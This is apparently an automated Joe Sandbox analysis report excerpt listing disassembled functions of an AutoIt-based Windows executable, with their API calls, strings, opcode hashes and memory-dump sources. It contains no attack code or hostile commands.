                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 69870386a86b50a65b09e9999911584b40cb17b81fb430370a8164407b57d1d9
                                          • Instruction ID: c6e394038b1e28021777f3380d39f53217bc088a7c3b0fb0471e72f7c8fa8a67
                                          • Opcode Fuzzy Hash: 69870386a86b50a65b09e9999911584b40cb17b81fb430370a8164407b57d1d9
                                          • Instruction Fuzzy Hash: 70E092702147218FD730EF28E4047467BE8AF80304F10892DE456C7341EBB4E488CFA1
                                          Function 00957C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00957C82
                                            • Part of subcall function 00923358: _doexit.LIBCMT ref: 00923362
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: bf1e553a284e303be3e91a67def4ee6b897302889be70df0137da9ef3dd5115b
                                          • Instruction ID: 3186264fb52c3f29d3f4b8b043fe8c1f618b0d317d88d67c84e76fb5deded049
                                          • Opcode Fuzzy Hash: bf1e553a284e303be3e91a67def4ee6b897302889be70df0137da9ef3dd5115b
                                          • Instruction Fuzzy Hash: E8D0123238832836D21572A9BD06BCA76484B85B56F144415BB48596D349D5458052A5
                                          Function 00941935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00941775
                                            • Part of subcall function 0097BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0094195E,?), ref: 0097BFFE
                                            • Part of subcall function 0097BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0097C010
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0094196D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                          • String ID: WIN_XPe
                                          • API String ID: 582185067-3257408948
                                          • Opcode ID: 06f060e47c729ae3de6fdfd1612dccf691d2339ad1b502091cd8bf7575172f3c
                                          • Instruction ID: 8abf2371831c55dbfad60e7f8e7958641b744aa5ed1c9d1037c3dcf157f74fa8
                                          • Opcode Fuzzy Hash: 06f060e47c729ae3de6fdfd1612dccf691d2339ad1b502091cd8bf7575172f3c
                                          • Instruction Fuzzy Hash: A9F06D71814009DFCB15DB90C998FECBBF8BB08300F600496E112A21A0C7355F84EF20
                                          Function 00985998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009859AE
                                          • PostMessageW.USER32(00000000), ref: 009859B5
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 7b7dc05779de08512c8705588484eff7c8d5a24d84a23580882363dd64dd5b49
                                          • Instruction ID: 6063aee5549b9efed2db12eea9d061e53289d423bf0334136d1e30dfe72d4726
                                          • Opcode Fuzzy Hash: 7b7dc05779de08512c8705588484eff7c8d5a24d84a23580882363dd64dd5b49
                                          • Instruction Fuzzy Hash: 17D0C9313943117AE664BB70DC1BFD76614AB44B50F011825B255AA2D0D9E0A800D754
                                          Function 00985964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0098596E
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00985981
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 74a22da7a882b7690eec58dc22369eb29b2828a171d0dcdbf5d1a75e12338529
                                          • Instruction ID: d2e544b9e12befa21a9ea06973dcbb480f368ef298b7fd68f9c418393d639561
                                          • Opcode Fuzzy Hash: 74a22da7a882b7690eec58dc22369eb29b2828a171d0dcdbf5d1a75e12338529
                                          • Instruction Fuzzy Hash: BCD0C931398311B6E664BB70DC2BFE76A14AB44B50F011825B259AA2D0D9E0A800D754